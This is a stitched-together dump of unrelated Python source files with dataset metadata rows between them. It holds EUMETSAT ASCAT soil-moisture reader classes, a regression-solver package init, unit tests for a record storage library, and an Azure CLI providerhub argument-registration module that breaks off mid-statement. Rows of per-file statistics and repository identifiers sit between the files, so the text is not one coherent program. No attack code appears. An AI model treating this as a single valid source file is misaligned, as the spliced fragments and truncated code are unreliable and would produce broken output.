How many minutes should a chunk of data cover.
"""
def __init__(self, path, month_path_str='', chunk_minutes=100):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_250_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_250_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm250PDUChunked, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format,
chunk_minutes=chunk_minutes)
class AscatL2Ssm125Nc(AscatL2SsmNc):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid NetCDF files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_125_ssm_l2.nc'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_125_ssm_l2.nc'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (62, 76, '%Y%m%d%H%M%S')
super(AscatL2Ssm125Nc, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm250Nc(AscatL2SsmNc):
"""
ASCAT A Level2 Soil Moisture at 25 km Swath Grid NetCDF files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_250_ssm_l2.nc'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_250_ssm_l2.nc'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (62, 76, '%Y%m%d%H%M%S')
super(AscatL2Ssm250Nc, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
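Each reader passes a `filename_datetime_format` triple `(start, end, fmt)` that slices the timestamp out of a product filename. A quick sketch of how such a triple works, using a made-up filename shaped like the `AscatL2Ssm125` pattern (the real parsing happens inside `AscatL2SsmBufr`):

```python
from datetime import datetime

# hypothetical filename matching 'M0?-ASCA-ASCSMR02-NA-5.0-%Y%m%d*.bfr'
fname = "M01-ASCA-ASCSMR02-NA-5.0-20200101120000.000000000Z.bfr"

start, end, fmt = 25, 39, "%Y%m%d%H%M%S"  # as in AscatL2Ssm125
ts = datetime.strptime(fname[start:end], fmt)
print(ts)  # 2020-01-01 12:00:00
```

The character offsets are fixed per product naming scheme, which is why the PDU and NetCDF variants each carry their own `(start, end)` pair.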
| 48.704 | 117 | 0.629189 | 1,560 | 12,176 | 4.660256 | 0.146795 | 0.059422 | 0.05282 | 0.045392 | 0.810316 | 0.803714 | 0.795736 | 0.769326 | 0.757221 | 0.756396 | 0 | 0.025119 | 0.293775 | 12,176 | 249 | 118 | 48.899598 | 0.820328 | 0.388387 | 0 | 0.709677 | 0 | 0.129032 | 0.196581 | 0.169231 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086022 | false | 0 | 0.032258 | 0 | 0.204301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a1bfcc08304d889e23e2b299ac51c819baa4e8b7 | 461 | py | Python | plasticnet/solvers/functional/__init__.py | donovanr/plastic_net | 28801059133e3f73359c5787ad235eac6c7e77ee | [
"MIT"
] | 1 | 2018-07-29T00:09:48.000Z | 2018-07-29T00:09:48.000Z | plasticnet/solvers/functional/__init__.py | donovanr/plasticnet | 28801059133e3f73359c5787ad235eac6c7e77ee | [
"MIT"
] | 28 | 2018-07-11T21:35:05.000Z | 2018-07-26T18:10:45.000Z | plasticnet/solvers/functional/__init__.py | donovanr/plastic_net | 28801059133e3f73359c5787ad235eac6c7e77ee | [
"MIT"
] | 2 | 2018-10-16T17:21:25.000Z | 2019-12-23T06:45:55.000Z | from .functional import (
ordinary_least_squares,
ridge,
lasso,
elastic_net,
general_plastic_net,
plastic_ridge,
plastic_lasso,
hard_plastic_net,
soft_plastic_net,
unified_plastic_net,
)
__all__ = [
"ordinary_least_squares",
"ridge",
"lasso",
"elastic_net",
"general_plastic_net",
"plastic_ridge",
"plastic_lasso",
"hard_plastic_net",
"soft_plastic_net",
"unified_plastic_net",
]
| 17.730769 | 29 | 0.661605 | 50 | 461 | 5.5 | 0.32 | 0.290909 | 0.145455 | 0.181818 | 0.916364 | 0.916364 | 0.916364 | 0.916364 | 0.916364 | 0.916364 | 0 | 0 | 0.238612 | 461 | 25 | 30 | 18.44 | 0.783476 | 0 | 0 | 0 | 0 | 0 | 0.301518 | 0.047722 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
62a9990b273f0363ddddc7994f1ef33a69139df5 | 2,766 | py | Python | tests/record_storage/test_read_write.py | aimhubio/aimrecords | ed0ca6d0ea2e5b498b9cd8f4e9c3f704cd4f9073 | [
"Apache-2.0"
] | 10 | 2020-05-19T22:24:54.000Z | 2021-02-25T01:52:08.000Z | tests/record_storage/test_read_write.py | aimhubio/aimrecords | ed0ca6d0ea2e5b498b9cd8f4e9c3f704cd4f9073 | [
"Apache-2.0"
] | 5 | 2020-07-11T16:01:22.000Z | 2021-01-21T11:45:01.000Z | tests/record_storage/test_read_write.py | aimhubio/aimrecords | ed0ca6d0ea2e5b498b9cd8f4e9c3f704cd4f9073 | [
"Apache-2.0"
] | 5 | 2020-05-20T00:49:58.000Z | 2021-01-20T12:59:18.000Z | import os
import tempfile
import unittest
from aimrecords.record_storage.reader import Reader
from aimrecords.record_storage.writer import Writer
class TestReadWrite(unittest.TestCase):
def test_dirty_read(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression='gzip')
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.flush()
reader = Reader(path, uncommitted_bucket_visible=True)
assert reader.get_records_num() == index + 1
assert index == int(reader.get(index).decode())
reader.close()
writer.close()
def test_read_write_on_existing_data(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression='gzip')
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.close()
writer = Writer(path, rewrite=False, compression='gzip')
for index in range(length, 2 * length):
writer.append_record(str(index).encode())
writer.flush()
reader = Reader(path, uncommitted_bucket_visible=True)
assert reader.get_records_num() == index + 1
assert index == int(reader.get(index).decode())
reader.close()
writer.close()
def test_uncommitted_read_on_closed(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression='gzip')
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.close()
reader = Reader(path, uncommitted_bucket_visible=True)
assert reader.get_records_num() == length
for index in range(length):
assert index == int(reader.get(index).decode())
reader.close()
def test_read_write(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression=None)
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.flush()
reader = Reader(path, uncommitted_bucket_visible=False)
assert reader.get_records_num() == 0
reader.close()
writer.close()
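The write/flush/read cycle these tests exercise can be illustrated with a tiny length-prefixed record store. This is emphatically not the aimrecords API or on-disk format, just a self-contained sketch of the append-then-read-back pattern the tests assert on:

```python
import os
import tempfile

class TinyWriter:
    """Append-only writer: each record is stored as a 4-byte big-endian
    length prefix followed by the record bytes."""
    def __init__(self, path):
        self._f = open(path, "ab")

    def append_record(self, data):
        self._f.write(len(data).to_bytes(4, "big") + data)

    def flush(self):
        self._f.flush()

    def close(self):
        self._f.close()

class TinyReader:
    """Reads all length-prefixed records back into memory."""
    def __init__(self, path):
        self._records = []
        with open(path, "rb") as f:
            while True:
                head = f.read(4)
                if not head:
                    break
                self._records.append(f.read(int.from_bytes(head, "big")))

    def get_records_num(self):
        return len(self._records)

    def get(self, index):
        return self._records[index]

with tempfile.TemporaryDirectory() as temp_dir:
    path = os.path.join(temp_dir, "loss")
    w = TinyWriter(path)
    for i in range(5):
        w.append_record(str(i).encode())
    w.close()
    r = TinyReader(path)
    print(r.get_records_num(), r.get(3).decode())  # 5 3
```

Opening the file in append mode (`"ab"`) is what makes the "read-write on existing data" scenario above work: a second writer simply continues the record stream.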
| 33.731707 | 71 | 0.57773 | 297 | 2,766 | 5.232323 | 0.20202 | 0.036036 | 0.03861 | 0.057915 | 0.810167 | 0.750965 | 0.750965 | 0.750965 | 0.750965 | 0.722008 | 0 | 0.010678 | 0.322849 | 2,766 | 81 | 72 | 34.148148 | 0.819007 | 0 | 0 | 0.737705 | 0 | 0 | 0.011569 | 0 | 0 | 0 | 0 | 0 | 0.114754 | 1 | 0.065574 | false | 0 | 0.081967 | 0 | 0.163934 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62c14001030056a6d58d1136a20c6db37e0874c6 | 33,001 | py | Python | src/providerhub/azext_providerhub/generated/_params.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 2 | 2021-06-05T17:51:26.000Z | 2021-11-17T11:17:56.000Z | src/providerhub/azext_providerhub/generated/_params.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 3 | 2020-05-27T20:16:26.000Z | 2020-07-23T19:46:49.000Z | src/providerhub/azext_providerhub/generated/_params.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 5 | 2020-09-08T22:46:48.000Z | 2020-11-08T14:54:35.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
# pylint: disable=line-too-long
from azure.cli.core.commands.parameters import (
get_three_state_flag,
get_enum_type,
resource_group_name_type
)
from azure.cli.core.commands.validators import validate_file_or_dict
from azext_providerhub.action import (
AddCanary,
AddProviderAuthentication,
AddProviderAuthorizations,
AddResourceProviderAuthentication,
AddCapabilities,
AddSkipRegions,
AddTemplateDeploymentOptions,
AddServiceTreeInfos,
AddResourceTypeEndpointProperties,
AddProviderHubMetadataProviderAuthorizations,
AddAuthorizations,
AddSwaggerSpecifications,
AddAuthorizationActionMappings,
AddLinkedAccessChecks,
AddThrottlingRules,
AddIdentityManagement,
AddCheckNameAvailabilitySpecifications,
AddResourcetyperegistrationServiceTreeInfos,
AddSubscriptionStateRules,
AddExtendedLocations,
AddResourceMovePolicy,
AddRequiredFeatures,
AddResourceCreationBegin,
AddResourcePatchBegin,
AddLoggingRules,
)
def load_arguments(self, _):
with self.argument_context('providerhub custom-rollout list') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
with self.argument_context('providerhub custom-rollout show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub custom-rollout create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('rollout_name', type=str, help='The rollout name.')
c.argument('canary', action=AddCanary, nargs='+',
help='The canary regions to apply the manifest.')
with self.argument_context('providerhub custom-rollout update') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
c.argument('canary', action=AddCanary, nargs='+',
help='The canary regions to apply the manifest.')
with self.argument_context('providerhub default-rollout list') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
with self.argument_context('providerhub default-rollout show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub default-rollout create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('rollout_name', type=str, help='The rollout name.')
        c.argument('row2_wait_duration', type=str,
                   help='The wait duration before the rollout begins in rest of the world two (ROW2).')
c.argument('skip_regions', action=AddSkipRegions,
nargs='*', help='The canary regions to skip.')
with self.argument_context('providerhub default-rollout update') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('rollout_name', type=str, help='The rollout name.')
        c.argument('row2_wait_duration', type=str,
                   help='The wait duration before the rollout begins in rest of the world two (ROW2).')
c.argument('skip_regions', action=AddSkipRegions,
nargs='*', help='The canary regions to skip.')
with self.argument_context('providerhub default-rollout delete') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub default-rollout stop') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub default-rollout wait') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub manifest checkin') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('environment', type=str, help='The environment supplied to the checkin manifest '
'operation.')
c.argument('arm_manifest_location', type=str, help='The baseline ARM manifest location supplied to '
'the checkin manifest operation.')
with self.argument_context('providerhub manifest generate') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('providerhub provider-registration show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('provider_authentication', action=AddProviderAuthentication, nargs='+',
help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.')
c.argument('provider_authorizations', action=AddProviderAuthorizations,
nargs='+', help='The resource provider authorizations.')
c.argument('provider_version', type=str,
help='The provider version. 2.0 is the only supported version.')
c.argument('provider_type', arg_type=get_enum_type(['NotSpecified', 'Internal', 'External', 'Hidden',
'RegistrationFree', 'LegacyRegistrationRequired',
                                                            'TenantOnly', 'AuthorizationFree']), help='Value can be "Internal", "External", "Hidden", "RegistrationFree", "TenantOnly" or "LegacyRegistrationRequired". RegistrationFree is for providers that do not need subscriptions to explicitly register to use the provider. The Hidden flag ensures that discovery APIs (GET /Providers) will not show the provider; however, a user can still write to the provider explicitly. TenantOnly will not appear in GET /Providers and will not allow registration from users. LegacyRegistrationRequired is for legacy providers that need RDFE registration in addition to ARM registration.')
        c.argument('capabilities', action=AddCapabilities, nargs='+', help='Allows access to the resource provider from a restrictive subscription quota (DreamSpark_2015-02-01 and CSP_2015-05-01). The requiredFeatures array is optional; if specified, the subscription should meet the quota and at least one of the features. If no capabilities are specified, the provider will be available to every subscription except the restrictive quotas. New providers are required to allow CSP_2015-05-01.')
c.argument('metadata', type=validate_file_or_dict,
help='The metadata.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('schema_owners', nargs='+',
help='Specifies an array of needed ACIS claims to modify the resource provider schema via ACIS.', arg_group='Management')
c.argument('manifest_owners', nargs='+',
help='Specifies an array of required ACIS claims to modify the resource provider\'s manifest content via ACIS.', arg_group='Management')
        c.argument('incident_routing_service', type=str,
                   help='The "Service" in IcM when creating or transferring incidents to the RP.', arg_group='Management')
        c.argument('incident_routing_team', type=str,
                   help='The "Team" in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_contact_email', type=str,
help='The email address of contacts for incidents related to the RP.', arg_group='Management')
c.argument('service_tree_infos', action=AddServiceTreeInfos, nargs='+', help='The ServiceTree information for the resource provider.',
arg_group='Management')
c.argument('resource_access_policy', arg_type=get_enum_type(['NotSpecified', 'AcisReadAllowed',
'AcisActionAllowed']), help='The resource access policy.',
arg_group='Management')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
        c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flags will be allowed.', arg_group='Features Rule')
        c.argument('providerhub_metadata_provider_authorizations',
                   action=AddProviderHubMetadataProviderAuthorizations, nargs='+', help='Available only for first party providers, this section can be used to bootstrap Service-to-Service authentication and authorization for the provider\'s application. When set, it allows the provider to access users\' subscriptions registered with them.', arg_group='Provider Hub Metadata')
c.argument('providerhub_metadata_rp_authentication', action=AddResourceProviderAuthentication, nargs='+', help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.',
arg_group='Provider Hub Metadata')
        c.argument('lighthouse_authorizations', action=AddAuthorizations, nargs='+', help='The Lighthouse authorizations.', arg_group='Provider Hub Metadata Third Party Provider Authorization')
        c.argument('managed_by_tenant_id', type=str, help='The managed-by tenant ID.', arg_group='Provider Hub Metadata Third Party Provider Authorization')
with self.argument_context('providerhub provider-registration update') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('provider_authentication', action=AddProviderAuthentication, nargs='+',
help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.')
c.argument('provider_authorizations', action=AddProviderAuthorizations,
nargs='+', help='The resource provider authorizations.')
c.argument('namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('provider_version', type=str,
help='The provider version. 2.0 is the only supported version.')
c.argument('provider_type', arg_type=get_enum_type(['NotSpecified', 'Internal', 'External', 'Hidden',
'RegistrationFree', 'LegacyRegistrationRequired',
                                                            'TenantOnly', 'AuthorizationFree']), help='Value can be "Internal", "External", "Hidden", "RegistrationFree", "TenantOnly" or "LegacyRegistrationRequired". RegistrationFree is for providers that do not need subscriptions to explicitly register to use the provider. The Hidden flag ensures that discovery APIs (GET /Providers) will not show the provider; however, a user can still write to the provider explicitly. TenantOnly will not appear in GET /Providers and will not allow registration from users. LegacyRegistrationRequired is for legacy providers that need RDFE registration in addition to ARM registration.')
c.argument('required_features', action=AddRequiredFeatures, nargs='+',
help='If specified, only subscriptions registered to the corresponding feature flag will be allowed.')
        c.argument('capabilities', action=AddCapabilities, nargs='+', help='Allows access to the resource provider from a restrictive subscription quota (DreamSpark_2015-02-01 and CSP_2015-05-01). The requiredFeatures array is optional; if specified, the subscription should meet the quota and at least one of the features. If no capabilities are specified, the provider will be available to every subscription except the restrictive quotas. New providers are required to allow CSP_2015-05-01.')
        c.argument('metadata', type=validate_file_or_dict,
                   help='Any object. Expected value: json-string/@json-file.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('schema_owners', nargs='+',
help='Specifies an array of needed ACIS claims to modify the resource provider schema via ACIS.', arg_group='Management')
c.argument('manifest_owners', nargs='+',
help='Specifies an array of required ACIS claims to modify the resource provider\'s manifest content via ACIS.', arg_group='Management')
c.argument('incident_routing_service', type=str,
help='The "Service" in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_routing_team', type=str,
help='The "Team" in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_contact_email', type=str,
help='The email address of contacts for incidents related to the RP.', arg_group='Management')
c.argument('service_tree_infos', action=AddServiceTreeInfos, nargs='+', help='The ServiceTree information for the resource provider.',
arg_group='Management')
c.argument('resource_access_policy', arg_type=get_enum_type(['NotSpecified', 'AcisReadAllowed',
'AcisActionAllowed']), help='The resource access policy.',
arg_group='Management')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
        c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flags will be allowed.', arg_group='Features Rule')
        c.argument('providerhub_metadata_provider_authorizations',
                   action=AddProviderHubMetadataProviderAuthorizations, nargs='+', help='Available only for first party providers, this section can be used to bootstrap Service-to-Service authentication and authorization for the provider\'s application. When set, it allows the provider to access users\' subscriptions registered with them.', arg_group='Provider Hub Metadata')
c.argument('providerhub_metadata_rp_authentication', action=AddResourceProviderAuthentication, nargs='+', help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.',
arg_group='Provider Hub Metadata')
        c.argument('lighthouse_authorizations', action=AddAuthorizations, nargs='+', help='The Lighthouse authorizations.', arg_group='Provider Hub Metadata Third Party Provider Authorization')
        c.argument('managed_by_tenant_id', type=str, help='The managed-by tenant ID.', arg_group='Provider Hub Metadata Third Party Provider Authorization')
c.ignore('properties')
with self.argument_context('providerhub provider-registration delete') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration generate-operation') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration wait') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub resource-type-registration list') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
with self.argument_context('providerhub resource-type-registration show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('resource_type', type=str,
help='The resource type.', id_part='child_name_1')
with self.argument_context('providerhub resource-type-registration create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('resource_type', type=str, help='The resource type.')
c.argument('routing_type', arg_type=get_enum_type(['Default', 'ProxyOnly', 'HostBased', 'Extension',
'Tenant', 'Fanout', 'LocationBased', 'Failover',
'CascadeExtension']), help='The resource routing type.')
c.argument('regionality', arg_type=get_enum_type(
['NotSpecified', 'Global', 'Regional']), help='The regionality of the resource type.')
c.argument('endpoints', action=AddResourceTypeEndpointProperties, nargs='+', help='The resource '
'type endpoint properties.')
c.argument('resource_creation_begin', action=AddResourceCreationBegin, nargs='+',
help='Extension options for handling the resource creation begin extension request.')
c.argument('resource_patch_begin', action=AddResourcePatchBegin, nargs='+',
help='Extension options for handling the resource patch begin extension request.')
c.argument('marketplace_type', arg_type=get_enum_type(
['NotSpecified', 'AddOn', 'Bypass', 'Store']), help='The resource type behavior in the marketplace.')
        c.argument('swagger_specifications', action=AddSwaggerSpecifications, nargs='+',
                   help='The OpenAPI (swagger) specifications of the resource type. RPaaS will use the swagger specs to validate HTTP requests/responses.')
c.argument('allowed_unauthorized_actions', nargs='+',
help='The allowed unauthorized actions.')
c.argument('authorization_action_mappings', action=AddAuthorizationActionMappings,
nargs='+', help='Allows RP to override action verb for RBAC purposes at ARM.')
c.argument('linked_access_checks', action=AddLinkedAccessChecks, nargs='+',
help='Enables additional Role Based Access Control (RBAC) checks on related resources.')
c.argument('default_api_version', type=str,
help='The default API version for the endpoint.')
        c.argument('logging_rules', action=AddLoggingRules, nargs='+',
                   help='Enables additional event logs the RP wants customers to see in their subscription for a particular action.')
c.argument('throttling_rules', action=AddThrottlingRules, nargs='+',
help='Allows RPs to set individual limits for different actions in terms of number of requests or number of resources (for collection read requests only).')
c.argument('required_features', action=AddRequiredFeatures, nargs='+',
help='If specified, only subscriptions registered to the corresponding feature flag will be allowed.')
        c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flags will be allowed.', arg_group='Features Rule')
        c.argument('enable_async_operation', arg_type=get_three_state_flag(),
                   help='Indicates whether the async operation is enabled for this resource type.')
        c.argument('enable_third_party_s2s', arg_type=get_three_state_flag(),
                   help='Indicates whether to enable third-party service-to-service (S2S) calls.')
c.argument('is_pure_proxy', arg_type=get_three_state_flag(),
help='Indicates whether this is a "PureProxy" resource type.')
c.argument('identity_management', action=AddIdentityManagement, nargs='+',
help='MSI related settings. RPaaS supports Managed Identity and can help simplify the onboarding process.')
c.argument('check_name_availability_specifications', action=AddCheckNameAvailabilitySpecifications, nargs='+',
help='RPaaS provides this feature at the platform level to help UserRPs with name availability checks without calling into the POST extension endpoints for the "checkNameAvailability" resource type.')
c.argument('disallowed_action_verbs', nargs='+',
help='The supported values are "read", "write", "delete", "action". This setting will block all operations of the specified type on the resource type. These actions map to the corresponding HTTP verbs.')
c.argument('service_tree_infos', action=AddResourcetyperegistrationServiceTreeInfos,
nargs='+', help='The ServiceTree information for the resource provider.')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
c.argument('subscription_state_rules', action=AddSubscriptionStateRules,
nargs='+', help='The subscription policy.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('extended_locations', action=AddExtendedLocations,
nargs='+', help='The extended locations property.')
c.argument('resource_move_policy', action=AddResourceMovePolicy, nargs='+',
help='Indicates the resource type has opted in to move operations.')
c.argument('resource_deletion_policy', arg_type=get_enum_type(['NotSpecified', 'CascadeDeleteAll',
'CascadeDeleteProxyOnlyChildren']), help='The property to customize RPaaS deletion operation.')
with self.argument_context('providerhub resource-type-registration update') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('resource_type', type=str, help='The resource type.')
c.argument('routing_type', arg_type=get_enum_type(['Default', 'ProxyOnly', 'HostBased', 'Extension',
'Tenant', 'Fanout', 'LocationBased', 'Failover',
'CascadeExtension']), help='The resource routing type.')
c.argument('regionality', arg_type=get_enum_type(
['NotSpecified', 'Global', 'Regional']), help='The regionality of the resource type.')
c.argument('endpoints', action=AddResourceTypeEndpointProperties, nargs='+', help='The resource '
'type endpoint properties.')
c.argument('resource_creation_begin', action=AddResourceCreationBegin, nargs='+',
help='Extension options for handling the resource creation begin extension request.')
c.argument('resource_patch_begin', action=AddResourcePatchBegin, nargs='+',
help='Extension options for handling the resource patch begin extension request.')
c.argument('marketplace_type', arg_type=get_enum_type(
['NotSpecified', 'AddOn', 'Bypass', 'Store']), help='The resource type behavior in the marketplace.')
        c.argument('swagger_specifications', action=AddSwaggerSpecifications, nargs='+',
                   help='The OpenAPI (swagger) specifications of the resource type. RPaaS will use the swagger specs to validate HTTP requests/responses.')
c.argument('allowed_unauthorized_actions', nargs='+',
help='The allowed unauthorized actions.')
c.argument('authorization_action_mappings', action=AddAuthorizationActionMappings,
nargs='+', help='Allows RP to override action verb for RBAC purposes at ARM.')
c.argument('linked_access_checks', action=AddLinkedAccessChecks, nargs='+',
help='Enables additional Role Based Access Control (RBAC) checks on related resources.')
c.argument('default_api_version', type=str,
help='The default API version for the endpoint.')
        c.argument('logging_rules', action=AddLoggingRules, nargs='+',
                   help='Enables additional event logs the RP wants customers to see in their subscription for a particular action.')
c.argument('throttling_rules', action=AddThrottlingRules, nargs='+',
